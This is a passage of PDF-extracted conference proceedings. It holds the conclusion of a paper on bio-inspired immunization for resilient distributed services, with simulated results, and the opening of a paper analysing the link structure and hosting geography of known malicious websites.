using a generalized cost metric per node for resource management. When a workflow is received,<br />

each node makes a local decision about task execution based on current local cost estimations. If<br />

local costs become less attractive than neighbor’s estimated costs then the workflow is forwarded to<br />

the node with the lowest estimated cost. Cost information is shared between nodes involved in a joint<br />

mission as part of workflow exchange messages.<br />

Attacks and failures may be detected indirectly, through their effects on the mission (see 3.1). To<br />

simplify our model, we currently consider the degradation of a task as causing direct impact in the<br />

mission performance. There are, however, related research efforts on mission mapping (Musman et<br />

al., 2010; Sorrel et al., 2008; Grimaila, 2008) that can provide a better assessment of the impact of<br />

localized failures to the overall mission.<br />

In general, the approach for detection may rely on a number of sources that include performance<br />

monitoring, anomaly detection, or resource utilization monitoring. These are all metrics that may be<br />

used to detect violations in resource utilization policies, or deviations from pre-defined (or learned, in<br />

the case of anomaly) QoS requirements for task execution.<br />

Dynamic resource management for mission continuity focuses on isolating the area (i.e. node, or<br />

services) associated with the damage to minimize the impact on mission execution. The re-allocation<br />

of resources and re-organization of tasks is coordinated through distributed, self-organizing<br />

algorithms and may take place at different scales – that is, from very localized modification involving a<br />

single service that has reported damage, to larger scale changes involving multiple services. An<br />

analog to this approach can be found in developmental biology, where cells (and other structures at<br />

different hierarchical levels) signal each other to induce a differentiation that will enable a needed<br />

capability. In our approach, mission-aware services will perceive the lack of damaged capability and<br />

will signal other services (as part of a distributed orchestration mechanism) to engage the new<br />

capabilities.<br />

3.3 Response and immunization<br />

The response and immunization mechanisms are responsible for both a short-term response to the<br />

reported damage and a longer-term mitigation strategy to future attacks of the same type. The<br />

intuitive response to a damaged component that can be replaced by alternative services in the<br />

environment is to immediately terminate the affected service. However, depending on the type of<br />

attack, the response and immunization layer may benefit from maintaining a potentially compromised<br />

node in operation. The goal is to identify the potential causes of the effects perceived as damage, and<br />

possibly correlate those events with the configuration of the node. This rudimentary approach to<br />

vulnerability estimation is useful in providing a hint to other services in the system that may be equally<br />

vulnerable to the same types of attacks. In our proposed infrastructure, the response and<br />

immunization mechanism work together to allow some time for the system to build such correlations<br />

before shutting down the node as a response to the damage. In order to do that without affecting the<br />

mission, a duplicate of workflows (which have been re-allocated to alternative nodes in response to<br />

the damage) is still sent to the damage node for processing, but it is also tagged to be ignored by<br />

subsequent processing services. This allows for the damaged component to remain ‘active’ for the<br />

characterization and immunization tasks.<br />

4. Preliminary experimental results<br />

A first proof of concept of the proposed approach was implemented and tested in a simulated<br />

networked environment using NS3. Simulated scenarios allow for larger scale experiments, and<br />

controlled attack conditions, facilitating the evaluation and analysis of the proposed algorithm. For the<br />

purposes of our first tests we considered a single service running on each node of our conceptual<br />

network, so the terms ‘service’ and ‘node’ are used interchangeably in our discussions. We also<br />

disregarded the complexities associated with service descriptions and interfaces. We focused, instead<br />

on the survivability and resilience aspects of the proposed approach. In our simulated scenario, each<br />

workflow is composed of 3 tasks, and a mission is composed of 400 workflows. There are 5 nodes (or<br />

services) executing independent parallel missions. In addition to those there are other 9 nodes<br />

available to be engaged for task execution, and 6 additional nodes playing the role of<br />

attackers.<br />

47


Marco Carvalho et al.<br />

Each node has a short sequence of bits (arbitrarily chosen to be a 4-bit string in our simulations) that<br />

represents its configuration. For example, the sequence 0000 could indicate a Linux-based host<br />

running the Apache Web Server of a given version, with other specific libraries and configurations. A<br />

different sequence of bits would represent an alternative configuration for the same service capability.<br />

The execution of each task in the workflow takes between 1 and 2 seconds under normal operational<br />

conditions. The simulation runs for 1200 seconds, and the attacking nodes become active only after<br />

200 seconds of simulation. At that point, each attacking node starts to launch attacks to a randomly<br />

selected victim every 6 seconds. Every task-processing node that receives an attack packet will<br />

match that attack against its own configuration (4-bit string). If at least a 75% match is found, the node<br />

accepts the attack and progressively degrades its performance.<br />

The scenario was executed with 20 different seeds and the results were averaged out across those<br />

runs. The metric of interest for comparing results is the percentage of completed workflows at any<br />

given moment of the simulation. Two baselines representing the upper and lower operational<br />

boundaries of the system were computed. The first baseline, identified in the chart as “Clean<br />

Baseline” (Figure 3), represents the performance of the system when there are no attacks during the<br />

whole simulation. The second baseline, identified in the chart as “Attack Baseline” (Figure 3),<br />

represents the performance of the system under attack but without any corrective measures. As<br />

previously discussed, an organic response to the degrading attacks should include both a recovery<br />

and adaptation component. The first strategy tested was a simple recovery strategy, consisting on<br />

restarting the compromised node to a previous safe image. This strategy was designed to simply<br />

mitigate the short-term effects of the problem. Figure 3 shows the performance of this strategy,<br />

identified as “Simple Reset” in the chart.<br />

Figure 3: Mission performance in different operation conditions<br />

A second strategy that was tested included in addition to a short-term response, an adaptation<br />

strategy to enhance the resilience of the system to subsequent attacks. The adaptation strategy can<br />

have multiple approaches. One approach can consist on randomizing the configuration of<br />

reinstantiated services and nodes. A second approach is to provide an immunization capability that<br />

will drive mutations of re-instantiated services to become resistant to previous attacks. In our<br />

experiments we have opted for the immunization strategy. The figure also shows the performance for<br />

this strategy, identified as “Immunization” in the chart.<br />

48


Marco Carvalho et al.<br />

Figure 4: Statistical significance of the performance gains due to the immunization strategy<br />

In the “Simple Reset” strategy, nodes detect and identify the attack and then reboot from a previously<br />

known safe state. The attack detecting happens indirectly (through the effects of the attack) and the<br />

identification happens by correlating the detection with the current state of the node. This process<br />

takes some time, during which the services of the node are degraded. In the “Immunization” strategy,<br />

the nodes additionally identify a “mutation” strategy that is likely to make it less vulnerable to the same<br />

attack. For our simulated scenario, the state of the node is represented by a 4-bit string and defines<br />

how vulnerable a node is to a given attack. The immunization process additionally involves<br />

announcing the 4-bit string to other nodes, which will drive “similar” nodes to mutate in order to<br />

become resistant to the attack. In the scenario illustrated in Figure 3, the “Immunization” starts with<br />

results close to the “Simple Reset” strategy, but then it improves getting close to the upper operational<br />

boundaries of the system (“Clean Baseline”). Figure Y shows how the p-value changes across time<br />

for a t-test of difference in percentage of completed missions for the “Immunization” and “Simple<br />

Reset” strategies. Approximately after 300 seconds in the simulation, the difference in performance<br />

between the “Immunization” and “Simple Reset” strategies becomes statistically significant. While<br />

very simplified at this point, our initial seems to indicate that an immunization-based strategy is more<br />

effective than a reactive approach based on simple node reset. Under the simplifying assumption that<br />

immunization has a fixed cost, fast recovery to continuous attacks will eventually be less effective<br />

than longer, but more permanent recovery to the same kinds of attacks.<br />

5. Conclusions<br />

In this paper we have described a three-layer concept for system resilience in distributed<br />

computational environments such as those found in cloud computing and service oriented<br />

architectures. Our proposal is based on the notions of self-organization and self-maintenance,<br />

leveraging distributed coordination algorithms for mission continuity. After a brief discussion on the<br />

capabilities enabled by cloud computing, service oriented architectures and some of their core<br />

services, we introduce our organic resilience approach. We define a threelayer defense infrastructure<br />

responsible for detecting damage (i.e. failures or attacks), maintaining mission execution, and<br />

identifying a short-term response and an immunization path for the problem. We also defined a very<br />

simplified scenario to illustrate the basic concepts of the proposed approach. In our simulations,<br />

services are equated to computational nodes in a distributed environment to simplify the simulations<br />

and allow for the use of network simulator as basis for test and evaluation. Our goal with these initial<br />

experiments was to illustrate the proposed concept, rather than making any quantitative claims. As<br />

part of our future work in this project we plan to more rigorously define the adaptation and<br />

diversification algorithms, and to better evaluate the agility, as well as the overhead and the<br />

effectiveness of the proposed approach.<br />

49


Acknowledgments<br />

Marco Carvalho et al.<br />

This material is partially based upon work supported by the Department of Energy National Energy<br />

Technology Laboratory under Award Number(s) DE-OE0000511.<br />

Disclaimer: Parts of this paper were prepared as an account of work sponsored by an agency of the<br />

United States Government. Neither the United States Government nor any agency thereof, nor any of<br />

their employees, makes any warranty, express or implied, or assumes any legal liability or<br />

responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or<br />

process disclosed, or represents that its use would not infringe privately owned rights. Reference<br />

herein to any specific commercial product, process, or service by trade name, trademark,<br />

manufacturer, or otherwise does not necessarily constitute or imply its endorsement,<br />

recommendation, or favoring by the United States Government or any agency thereof. The views and<br />

opinions of authors expressed herein do not necessarily state or reflect those of the United States<br />

Government or any agency thereof."<br />

References<br />

Abbes, T., Bouhoula, A., and Rusinowitch, M. (2004) “Protocol analysis in intrusion de- tection using decision<br />

tree,” in Information Technology: Coding and Computing, 2004. Proc. ITCC 2004. Intl. <strong>Conference</strong> on, vol.<br />

1.<br />

Benatallah, B., Hacid, M., Rey, C. and Toumani, F. (2003), “Semantic reasoning for web services discovery,” in<br />

Proc. of Workshop on E-Services and the Semantic Web at WWW 2003.<br />

Bradley, W. B., and Maher, D. P. (2004). The NEMO P2P Service Orchestration Framework. In Proceedings of<br />

the Proceedings of the 37th Annual Hawaii International <strong>Conference</strong> on System Sciences (HICSS'04) -<br />

Track 9 - Volume 9 (HICSS '04), Vol. 9. IEEE Computer Society, Washington, DC, USA, 90290.3-.<br />

Carvalho, M., Lamkin, T., Perez, C. (2010) Organic Resilience for Tactical Environments. 5 th International ICST<br />

Confernece on Bio-Inspired Models of Network, Information, and Computing Systems (Bionetics). Boston,<br />

MA, December, 2010.<br />

Carvalho, M. M., Pechoucek, M., and Suri, N. (2005) “A mobile agent-based middleware for opportunistic<br />

resource allocation and communications,” in DAMAS, pp. 121–134.<br />

Cho, S. and Park, H. (2003), “Efficient anomaly detection by modeling privilege flows using hidden Markov<br />

model,” Computers & Security, vol. 22, no. 1, pp. 45–55.<br />

Cohen, F. (1995), Protection and Security on the Information Superhighway, Wiley and Sons, 1995.<br />

Dasgupta, D. and Fabio Gonzalez, (2002), An immunity-based technique to characterize intrusions in computer<br />

networks, IEEE Trans. Evolutionary Comp. 6 (3), pp. 281–291, June 2002.<br />

Grimaila, M.R., “Improving the Cyber Incident Mission Impact Assessment Process,” Cyber Security and<br />

Information Intelligence Research Workshop (CSIIRW 2008), Oak Ridge National Laboratory, Oak Ridge,<br />

TN, May 12-14, 2008.<br />

Klusch, M., Fries, B., and Sycara, K. (2006) “Automated semantic web service discovery with OWLSMX,” in<br />

Proceedings of the fifth international joint conference on Autonomous agents and multiagent systems, pp.<br />

915–922, ACM.<br />

Lardieri, P., Balasubramanian, J., Schmidt, D. C., Thaker, G., Gokhale, A., and Damiano, T. (2007) “A multilayered<br />

resource management framework for dynamic re- source management in enterprise dre systems,”<br />

J. Syst. Softw., vol. 80, no. 7, pp. 984–996.<br />

Liang, Gang. (2006) An Immunity-Based Dynamic Multilayer Intrusion Detection System, Lecture Notes In<br />

Computer Science. Heidelberg: Springer Berlin 2006.<br />

Li, X., and Ye, N. (2001) “Decision tree classifiers for computer intrusion detection,” Jour- nal of Parallel and<br />

Distributed Computing Practices, vol. 4, no. 2, pp. 179–190.<br />

Lord, P., Alper, P., Wroe, C., and Goble, C. (2005) “Feta: A light-weight architecture for user oriented semantic<br />

service discovery,” The Semantic Web: Research and Applications, pp. 17–31.<br />

Microsoft (2010) “BizTalk Server”, http://www.microsoft.com/biztalk/en/us/host-integration.aspx<br />

Musman, S., Temin, A., Tanner, M., Fox, D. and Pridemore, B. (2010) “Evaluating the impact of cyber attacks on<br />

missions,” in 5th International <strong>Conference</strong> on Information Warfare and Security. Wright-<br />

OASIS, (2002) “UDDI Specifications.” http://www.oasis-open.org/committees/uddi-spec/doc/ tcspecs.htm.<br />

OASIS, (2009) “Web Services Dynamic Discovery (WS-Discovery).” Available online at: http://docs.oasisopen.org/ws-dd/discovery/1.1/wsdd-discovery-1.1-spec.html.<br />

Ourston, D., Matzner, S., Stump, W., and Hopkins, B. (2003) “Applications of hidden markov models to detecting<br />

multi-stage network attacks,” Proceedings of the 3<strong>6th</strong> Annual Hawaii International <strong>Conference</strong> on System<br />

Sciences, p. 10.<br />

Papazoglou, M., Traverso, P., Dustdar, S., and Leymann, F. (2008) “Service-oriented computing: A research<br />

roadmap,” Intl. Journal of Cooperative Information Systems, vol. 17, no. 2, pp. 223–255.<br />

Patterson AFB, Ohio, USA: Air Force Institute of Technology, April 8-9, pp. 446–456.<br />

Ranjan, R., Zhao, L., Wu, X., Liu, A., Quiroz, A., and Parashar, M. (2010) “Peer-to-Peer Cloud Provisioning:<br />

Service Discovery and Load-Balancing,” Cloud Computing, pp. 195–217.<br />

50


Marco Carvalho et al.<br />

Sorrels, D., Grimaila, M.R., Fortson, L.W., and Mills, R.F., (2008) “An Architecture for Cyber Incident Mission<br />

Impact Assessment (CIMIA),” Proceedings of the 2008 International <strong>Conference</strong> on<br />

Information Warfare and Security (ICIW 2008), Peter Kiewit Institute, University of Nebraska Omaha, 24-25 April<br />

2008.<br />

Tran, D. T., Hoang, N. H., and Choi, E. (2007) The WORKGLOW System in P2P-based Web Service<br />

Orchestration. In Proceedings of the 2007 International <strong>Conference</strong> on Convergence Information<br />

Technology (ICCIT '07). IEEE Computer Society, Washington, DC, USA, 2312-2317.<br />

DOI=10.1109/ICCIT.2007.377 http://dx.doi.org/10.1109/ICCIT.2007.377<br />

W3C (2007), “Semantic Annotations for WSDL (SAWSDL).” http://www.w3.org/2002/ws/sawsdl/.<br />

Yuan, S.; Chen, Q.; Li, P., (2009) Design of a four-layer IDS model based on immune danger theory,<br />

Proceedings of the 5th International <strong>Conference</strong> on Wireless Communications, Networking and Mobile<br />

Computing, WiCOM 2009<br />

Yasin, R. (2010) GCN, http://gcn.com/articles/2010/10/27/cia-hunt-cloud-computing.aspx<br />

51


Link Analysis and Link Visualization of Malicious Websites<br />

Manoj Cherukuri and Srinivas Mukkamala<br />

(ICASA)/CAaNES)/New Mexico Institute of Mining and Technology, USA<br />

manoj@cs.nmt.edu<br />

srinivas@cs.nmt.edu<br />

Abstract: In this paper we present web crawling, Meta searches, geo location tools, and computational intelligent<br />

techniques to assess the characteristics of a cyber-incident to determine if an incident is likely to be caused by a<br />

certain group, geographical location of the source, intent of the attack, and useful behavioral aspects of the<br />

attack. The malicious websites extracted from the identified sources acted as seeds for our crawler and were<br />

crawled up to two hops traversing through all the hyperlinks emerging out from these pages. After crawling, all<br />

the websites were translated to their geographic locations based on the location of the server on which the<br />

website is hosted using the Internet Protocol (IP) address to the geographical location mapping databases. We<br />

applied social networking analysis techniques to the link structure of the malicious websites to put forward the<br />

properties of the malicious websites and compared them with that of the legitimate websites. We identified the<br />

potential sources or websites that publish malicious websites using the meta-searches. Our approach revealed<br />

that the behavior of the malicious websites with respect to their indegrees, outdegrees and the clustering<br />

coefficient differ from that of the legitimate websites and some malicious websites acted as promoters for other<br />

malicious websites. The link visualization showed that the links traversing across the malicious websites are not<br />

confined to the region where the website was hosted.<br />

Keywords: link analysis, link visualization, malicious websites, social networking analysis techniques<br />

1. Introduction<br />

The increase in the number of internet users and bandwidth resulted in the proliferation of the<br />

websites. World Internet Usage and Population Statistics (2010) stated that, as of June 2010, there<br />

are about 2 billion internet users throughout the world with a growth rate of about 440% over a<br />

decade. December 2009 Web Server Survey (2009) affirmed that there are about 240 million<br />

websites hosted all over the world. The prospective growth rate of the internet users and their huge<br />

number created a new means of making revenue for the attackers, people who contribute to the<br />

malicious activities on the web. This huge market being exploited by the attackers is often referred to<br />

as the Underground Economy. Cheng (2008) listed that, as of 2008, the market for the underground<br />

economy was about US$276 million with a potential of billions of dollars. Luvender (2010) stated that,<br />

as of April 2010, United States alone is facing a loss of about $200 billion per year.<br />

A malicious website is a website which hosts malicious code to attack the client’s machine or spoofs<br />

the client by building up a look alike. The malicious script on the webpage is executed on loading the<br />

webpage and malicious script or file is installed without the users consent by exploiting the<br />

vulnerability of an application or by other possible means. The installed program reports the user<br />

sensitive data to the attacker. The underground economy has its own hierarchy of an organization<br />

with different sets of people (based on their roles) working collaboratively to exploit the potential of the<br />

underground economy. Important roles contributing to the hierarchy of the underground economies<br />

suggested by Zhuge et al. (2007) are Virus Writers, Website Masters, Envelope Stealers, Virtual<br />

Asset Stealers and Virtual Asset Sellers. Virus writers are responsible for writing up the malicious<br />

code. Website masters build up the websites and attract the traffic to their hosted websites using the<br />

approaches like search engine optimizations, blogging, spam etc. The terms website masters and<br />

traffic sellers are used interchangeably in this document. Envelope stealer purchases the malicious<br />

code and web traffic from the virus writers and website masters respectively. Envelope stealers<br />

capture the raw data from the victim’s machine and sell it out to the virtual asset stealers. Virtual asset<br />

stealers extract the useful information from the raw data purchased to convert it into a virtual asset.<br />

Virtual asset stealer sells the virtual assets to the Virtual asset sellers. Virtual asset sellers sell the<br />

virtual assets to the clients based on the type of the asset.<br />

Figure 1 obtained from Google Online Security blog shows an increase in number of malicious<br />

websites (Provos, 2010). The increase in the number of users of the internet had made the web a<br />

promising means for spreading the malware. The exponential growth of the websites on the World<br />

Wide Web has made the traditional crawling an infeasible option for detecting the malicious websites.<br />

The crawling mechanism must be associated with intelligence to get an optimal detection rate, often<br />

referred to as intelligent crawling. Previous works had shown that some of the hosting companies are<br />

52


Manoj Cherukuri and Srinivas Mukkamala<br />

acting as the safe medium for hosting the malicious websites (Kalafut, Shue and Gupta, 2010) and<br />

used code based and host based features for the detection of malicious websites dynamically (Ma et<br />

al., 2009; Cova, Kruegel and Vigna, 2010). In this paper we presented a few interesting heuristics of<br />

these malicious websites that help in enhancing the detection rate of the malicious websites.<br />

Figure 1: Growth of the number of entries on the Google Safe Browsing Malware List<br />

This paper is organized as follows: in section 2, we discuss the technical terms that help in<br />

understanding our results. In section 3, we discuss the processes involved in our study. In section 4,<br />

we describe our dataset. In section 5, we discuss about the analysis of the dataset. In section 6, we<br />

discuss about the link visualization. In section 7, we conclude with the results.<br />

2. Related technical terms<br />

2.1 Indegree<br />

Indegree of a node is defined as the number of edges pointing towards a node. For example, the<br />

indegree of node A in Figure 2 is 3 since there are three edges from nodes B, C, D pointing towards<br />

node A.<br />

Figure 2: Graph demonstrating node A with indegree 3<br />

53


2.2 Outdegree<br />

Manoj Cherukuri and Srinivas Mukkamala<br />

Outdegree of a node is defined as the number of edges pointing out from a node. For example, the<br />

outdegree of node A in Figure 3 is 3 since there are three edges emerging from A pointing towards<br />

nodes B, C, D.<br />

Figure 3: Graph demonstrating node A with outdegree 3<br />

2.3 Clustering coefficient<br />

Clustering coefficient is the measure of degree of closeness among the nodes of a graph (Clustering<br />

Coefficient, 2010). Chakrabarti and Faloutsos (2006) stated that the clustering coefficient represents<br />

the clumpiness of the graph. Clustering coefficient of a node is computed as the ratio of number of<br />

links among the linked nodes of a node to the number of possible links among the linked nodes of a<br />

node. The clustering coefficient of the nodes with 0 or 1 neighbors is 0.<br />

Clustering coefficient of all the nodes are computed and averaged to get the clustering coefficient of<br />

the network. For example, consider the graph shown in the Figure 4.<br />

Node A has three neighbors namely, B, C and D. BC is the only link among the neighbors of A.<br />

Number of possible links among the neighbors of A are 3 (i.e. 3 C2). Therefore, the clustering<br />

coefficient of A is 0.33.<br />

Node B has two neighbors and there is one link among the neighbors of B. Therefore, the<br />

clustering coefficient of B is 1.<br />

Node C has two neighbors and there is one link among the neighbors of C. Therefore, the<br />

clustering coefficient of C is 1.<br />

Node D has two neighbors and there is no link among the neighbors of D. Therefore, the<br />

clustering coefficient of D is 0.<br />

Node E has one neighbor and there is one link among the neighbors of E. Therefore, the<br />

clustering coefficient of E is 0.<br />

Figure 4: Graph used for explaining clustering coefficient<br />

The clustering coefficient of a graph is computed using the following formula,<br />

54


Manoj Cherukuri and Srinivas Mukkamala<br />

<br />

1<br />

where ‘C’ represents the clustering coefficient of the graph, Ci represents the clustering coefficient of<br />

the node ‘i’ and ‘n’ is the total number of nodes in the graph (Clustering Coefficient, 2010). The<br />

clustering coefficient of the graph in the figure above is 0.466 (i.e.1/5(0.33+1+1+0+0).<br />

3. Processes<br />

Construction of our dataset is composed of three processes.<br />

The first process deals with the collection of malicious websites from multiple sources<br />

The second process deals with the construction of link structure for the malicious domains<br />

obtained in the previous process<br />

The third process deals with computing the geographical location of the websites based on the IP<br />

address to geographical location mapping<br />

3.1 Collection of malicious websites<br />

The process of collecting the malicious websites is initialized by identifying the potential sources using<br />

the meta-search engines. These sources publish the websites with different sets of associated<br />

attributes. Some of the attributes associated with these domains are date, type of attack, executable<br />

name and IP address. A custom parser was used for each website source to retrieve the domain<br />

name and the IP address if available. All the malicious websites collected from these sources are<br />

stored in the database.<br />

3.2 Construction of link structure for malicious websites<br />

Crawling is performed on the malicious websites obtained from the previous process using a custom<br />

program. The malicious websites are crawled till the second hop. The flowchart for the process of<br />

building the link structure is shown in the figure 6. All the malicious domains retrieved from various<br />

sources are loaded which act as the seeds for the crawling process and ‘n’ is the total number of<br />

malicious websites. A custom crawler was built to retrieve the content of the malicious websites and<br />

parse all the anchor tags from the content. The parsing of the anchor tags from the website content is<br />

done using the BeautifulSoup (Beautiful Soup, 2010), widely used html parser. All the links originating<br />

from respective malicious websites are stored in the database. The domain is parsed from each such<br />

link and is stored in the tuple corresponding to that link. If the link URL is not listed in the malicious<br />

websites then it is added to a list called as LinkWebsites to avoid duplicate URLs. Once all the<br />

malicious domains are crawled and their corresponding links are stored, the LinkWebsites list is<br />

loaded into MaliciousWebsites list to crawl all the new websites obtained in the first hop from the<br />

malicious websites. Again the process of crawling, parsing anchor tags and storing the links is<br />

performed. Thus, all the links within the first two hops emerging from the malicious websites are<br />

obtained.<br />

3.3 Computing geographical location of websites<br />

The location of the server on which the website is hosted was determined using the IP address to<br />

geographic location mapping. All the distinct domains that are stored during the link analysis phase<br />

are translated to their corresponding IP addresses using the Domain Name Servers (DNS). A custom<br />

script is used to perform the domain name to IP address translation using the ‘nslookup’ command.<br />

The IP address to location mapping is done using the open source database. All the IP addresses for<br />

which the location is not identified are mapped to latitude and longitude values 0 and 0 respectively.<br />

4. Dataset<br />

For our experiments, all the potential sources for the malicious websites were identified using the<br />

meta-search engines. Such identified sources used for the study were PhishTank, Malware Domain<br />

Blocklist, abuse.ch, MalwarePatrol, joewein.de LLC. and Malware Domain List.<br />

55


Manoj Cherukuri and Srinivas Mukkamala<br />

Figure 5: Flowchart for the process of malicious websites collection.<br />

All the malicious websites listed in these sources were collected and stored in the database. Crawling<br />

was performed on the collected malicious websites up to the third hop as described in the section 4.2<br />

to build the link structure for all the malicious websites.<br />

Finally, the domains obtained during the first two processes of the data collection were translated to<br />

their geographical location using the process described in the section 4.3. To perform a comparative<br />

analysis of the malicious websites against the legitimate websites, the top 1500 webistes were<br />

downloaded from Alexa (Top Sites, 2010), a source for top websites and were crawled upto the<br />

second hop. This domain is reffered as a set of legitimate or non-malicious websites in the remaining<br />

part of this paper.<br />

Around 350,000 distinct malicious websites were collected from the previously mentioned sources.<br />

Since these domains were detected and flagged as malicious, major portion of them were down at the<br />

time of the analysis. Only about 20,000 distinct URLs were alive at the time of our analysis. About<br />

only 5.7% of the malicious websites collected were alive for our analysis. Link analysis was performed<br />

on about 19,000 malicious websites of the 20,000 live malicious websites. Remaining websites did<br />

not have any text to perform link analysis as they were pointing out to files like executables, jars,<br />

binaries etc.<br />

Around 600,000 Uniform Resource Locators (URLs) were crawled during the collection of our dataset.<br />

The URLs were crawled at the rate 50 URLs per minute. Of the live malicious websites, 14,970<br />

domains were hosted in United States. The top five countries contributed 83% of the total malicious<br />

websites of our dataset.<br />

56


Manoj Cherukuri and Srinivas Mukkamala<br />

Figure 6: Process of construction of link structure up to two hops originating from malicious websites<br />

57


Manoj Cherukuri and Srinivas Mukkamala<br />

Figure 7: Overview of the process for the construction of the dataset<br />

Table 1: Top five countries by the number of malicious websites hosted in our dataset<br />

5. Link analysis<br />

Country Number of malicious websites<br />

United States 14790<br />

Philippines 1086<br />

Canada 432<br />

Germany 183<br />

United Kingdom 143<br />

5.1 Outdegree and indegree of malicious websites<br />

The indegree and the outdegree of the malicious websites within the dataset were computed and<br />

plotted two graphs representing the count of the malicious domains versus the indegree and the<br />

outdegree. For computing the indegree and the outdegree of the websites, we considered only the<br />

links among different domains as most of the links within the same domain were identified to be<br />

navigational links. The count versus the indegree and the outdegree graphs are shown in Figure 8.<br />

The outdegree and the indegree of the malicious websites did not satisfy the power law in contrast to<br />

the World Wide Web graph (Watts and Strogatz, 1998).<br />

In an attempt to identify an equation that suites the indegrees and oudegrees of malicious websites,<br />

we identified that the malicious websites satisfy the power law with an exponential cutoff. The Lambda<br />

and the Gamma values of the power law with exponential cutoff equation for the indegree and the<br />

outdegree of malicious websites were identified to be 12.32, 0.9 and 8.32, 1.02 respectively.<br />

Correlation coefficient was measured to verify the fit of these equations. The correlation coefficient<br />

was 0.98 and 0.99 for the indegree and the outdegree respectively signifying a good fit.<br />

<br />

.<br />

<br />

<br />

Where <br />

<br />

is the exponential cutoff and is the power law term (Clustering Coefficient, 2010)<br />

58


Manoj Cherukuri and Srinivas Mukkamala<br />

<br />

<br />

<br />

<br />

. . .<br />

<br />

<br />

. . .<br />

Figure 8: Count of malicious websites versus indegree (left) and outdegree on the log-log scale (right)<br />

The average indegree of the malicious websites was 4.1 and the average outdegree of the malicious<br />

websites was 3.9. The standard deviation of the indegree and the outdegree of the malicious<br />

websites was 9.3 and 6.04 respectively. The average indegree was greater than the average<br />

outdegree of the malicious websites, even though the indegree computation is limited to the crawled<br />

dataset. This indicates that the malicious websites tend to have higher indegree over their outdegree.<br />

Series1 represents count versus indegree and count versus outdegree in the left and the right graphs<br />

respectively. The outdegree of the malicious websites was compared to the outdegree of the<br />

legitimate websites. We avoided the indegree in this study as the indegrees are limited to the links<br />

existing within the dataset. graph plotted with the outdegrees of the malicious and the legitimate<br />

websites is shown in Figure 9.<br />

59


Manoj Cherukuri and Srinivas Mukkamala<br />

Figure 9: Count of malicious websites versus outdegree on the log-log scale for the malicious and the<br />

non-malicious websites<br />

The average outdegree of the malicious websites was 3.9 with a standard deviation of 6.04. The<br />

average outdegree of the non-malicious websites was 39.17 with a standard deviation of 30.64. The<br />

standard deviation of the non-malicious websites was very high compared to the malicious websites.<br />

The standard deviation of the outdegree of the malicious websites and the non-malicious websites<br />

about the mean signify that the major portion of the non-malicious websites have an outdegree<br />

greater than 10 and the major portion of the malicious websites have an outdegree less than10. The<br />

spike in the series of malicious websites at the outdegree of 89 was due to a cluster of websites<br />

(about 35 websites) which had links to each other randomly.<br />

5.2 Malicious websites linked through a non-malicious website<br />

For this analysis, a graph G (V, E) was constructed, where V is the set of vertices and E is the set of<br />

edges. All the distinct domains obtained during the construction of the link structure were considered<br />

as the vertices of graph G. Based on the links obtained during the construction of link structure, the<br />

vertices were connected with directional edges.<br />

All the malicious websites that were part of the link structure were loaded into set S. In order to<br />

identify the non-malicious websites facilitating malicious websites, all the vertices which were not in S<br />

and had a minimum of one edge pointing towards them from a vertex in S and minimum of one edge<br />

emerging from them towards another vertex in S were selected.<br />

In our study of link analysis, it was observed that around 5000 malicious websites were linked through<br />

950 non-malicious websites. In this analysis, we tried to identify the domains which were not malicious<br />

but had links to malicious websites.<br />

In order to make the study effective, some of these non-malicious domains were visited manually to<br />

get a better knowledge about how the links to malicious domains were being placed in the nonmalicious<br />

domains. The main reason for this sort of linking was that the traffic sellers have built up<br />

websites with high pagerank that drives traffic towards the malicious websites which are short lived<br />

and according to Stevens (2010), the traffic sellers are paid based on the number of clicks or number<br />

of victims.<br />

As most of the traffic towards the non-popular domains is obtained through search engines, the traffic<br />

sellers are using these non-malicious domains as the means of driving towards the newly built<br />

malicious websites. The distribution of the outdegrees of the facilitating websites is shown in Figure<br />

10. Figures 11, 12 and 13 show screenshots of websites promoting malicious websites in different<br />

ways.<br />

60


Manoj Cherukuri and Srinivas Mukkamala<br />

Figure 10: Number of facilitating websites against their respective outdegrees on the log-log scale<br />

The mean of the facilitating websites was identified to be 50.12 with a standard deviation of 30.13.<br />

The mean outdegree of the facilitating websites is high compared to the mean outdegree of the<br />

malicious and the legitimate websites. The facilitating websites are having high outdegree mimicking<br />

the behavior of the legitimate websites in contrast to that of the malicious websites.<br />

Figure 11: Figure shows a screenshot of beautfulwallpapers.com<br />

The website in Figure 11 is non-malicious but has links to other malicious websites on the top left<br />

corner (marked in box) deceiving the users as all of them belong to the same website.<br />

Figure 12: Figure shows a screenshot of bizar.com<br />

The website in Figure 12 is non-malicious but promotes links to malicious websites with relevant<br />

content at the bottom of the page (marked in box).<br />

61


Manoj Cherukuri and Srinivas Mukkamala<br />

This website in Figure 13 is not malicious but has links to other malicious websites on the right column<br />

(marked in box) with the heading as “TRY MORE”. Similarity among the products on the right column<br />

with the product of the main website draws the user’s attention towards them.<br />

5.3 Malicious websites linked to other malicious websites<br />

For this analysis, a graph G (V, E) was constructed, where V is the set of vertices and E is the set of<br />

edges. All the malicious websites that participated in the construction of the link structure were<br />

considered as the vertices of graph G. Based on the links obtained during the construction of the link<br />

structure, the vertices were connected with directional edges. In order to identify the malicious<br />

websites linked to other malicious websites, all the vertices which had links to another vertex were<br />

selected.<br />

Figure 13: Figure shows the screenshot of cddvdcopy.net<br />

In our study of link analysis, it was observed that around 1000 malicious websites were linked directly<br />

to another malicious website. Manual analysis was done on these sites to have a better knowledge<br />

about the linking mechanism. The reason for having such links might be that many malicious domains<br />

are under the control of a single envelope stealer trying to host multiple types of attacks on different<br />

domains. In such a case the envelope stealers would prefer to have links among the malicious<br />

domains under their control. The domains encountered under this category were less compared to the<br />

previous category. The main reason might be the restriction for the traffic sellers from the envelope<br />

stealers as the victims become common among the different envelope stealers. However, to come to<br />

a conclusion on this point, a detailed analysis on the coding style and the type of attack used needs to<br />

be figured out which is out of scope for this study. Figures 14, 15 and 16 show screenshots of the<br />

examples of malicious websites under this category.<br />

62


Manoj Cherukuri and Srinivas Mukkamala<br />

Figure 14: Screenshot of the website legalizationofmarijuana.com<br />

Figure 15: Screenshot of the website howtogrowmarijuanablog.com<br />

The Figures 14, 15 and 16 are screenshots of malicious websites linking to other malicious websites.<br />

All these three sites are malicious and have links to each other under the section links on the left<br />

column of the page (marked in box).<br />

5.4 Clustering coefficient of malicious websites<br />

Clustering coefficient was computed among the malicious websites to identify the closeness among<br />

the malicious websites and compared it with the clustering coefficient of the legitimate websites to<br />

understand the differences in the linking mechanism. The clustering coefficient of the malicious<br />

websites was identified to be 0.18 and a significant portion of this value is contributed by the<br />

